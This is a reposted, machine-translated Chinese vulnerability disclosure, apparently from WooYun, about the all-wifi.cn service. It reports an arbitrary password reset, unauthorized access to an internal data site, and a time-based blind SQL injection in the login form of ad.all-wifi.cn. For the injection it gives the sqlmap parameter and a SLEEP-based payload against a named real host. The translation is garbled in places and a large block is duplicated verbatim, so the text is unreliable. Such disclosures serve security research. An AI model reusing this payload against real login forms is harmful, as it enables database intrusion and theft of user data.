wifi安全之ALLWIFI多处漏洞打包(任意重置用户密码/sql注入影响2万路由器/未授权访问)
漏洞标题 wifi安全之ALLWIFI多处漏洞打包(任意重置用户密码/sql注入影响2万路由器/未授权访问) 相关厂商 all-wifi.cn 漏洞作者 千机 提交时间 2016-05-13 19:1…
漏洞标题
Wifi安全ALLWIFI多个漏洞包(任意重置用户密码/sql注入影响20,000个路由器/未经授权的访问)
相关制造商
All-wifi.cn
漏洞作者
千机
提交时间
2016-05-13 19: 17
公共时间
2016-06-27 19: 20
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
Mysql的
漏洞详细信息
第一个是任意重置用户密码漏洞。
http://social.all-wifi.cn/index.php/login/login
看看像allwifi这样的app界面。
将验证码直接返回密码。
成功登录
然后sql注入
http://ad.all-wifi.cn/index.php/index/index.html
登录时存在Sql注入
Sqlmap从存储的会话:恢复以下注入点
---
参数:用户(POST)
输入:和/或基于时间的盲
标题: MySQL>=5.0.12 AND基于时间的盲(SELECT)
有效载荷: user=admin')AND(SELECT * FROM(SELECT(SLEEP(5)))XJBB)AND('yopl'
='yopl&安培;密码=管理员
3.33亿wifi_adcount,不知道它是什么
2w7路线
足以证明伤害,而不是深刻
然后有未经授权的访问,
http://lib.all-wifi.cn/
这个网站可以看到一些数据图表和表格等,是敏感信息吗?
漏洞证明:
修理计划:
改变和改变
版权声明:请注明出处。成千上万的机器@乌云
将验证码直接返回密码。
成功登录
然后sql注入
http://ad.all-wifi.cn/index.php/index/index.html
登录时存在Sql注入
Sqlmap从存储的会话:恢复以下注入点
---
参数:用户(POST)
输入:和/或基于时间的盲
标题: MySQL>=5.0.12 AND基于时间的盲(SELECT)
有效载荷: user=admin')AND(SELECT * FROM(SELECT(SLEEP(5)))XJBB)AND('yopl'
='yopl&安培;密码=管理员
3.33亿wifi_adcount,不知道它是什么
2w7路线
足以证明伤害,而不是深刻
然后有未经授权的访问,
http://lib.all-wifi.cn/
这个网站可以看到一些数据图表和表格等,是敏感信息吗?
漏洞证明:
修理计划:
改变和改变
版权声明:请注明出处。成千上万的机器@乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 426 )
- 分类:黑客技术
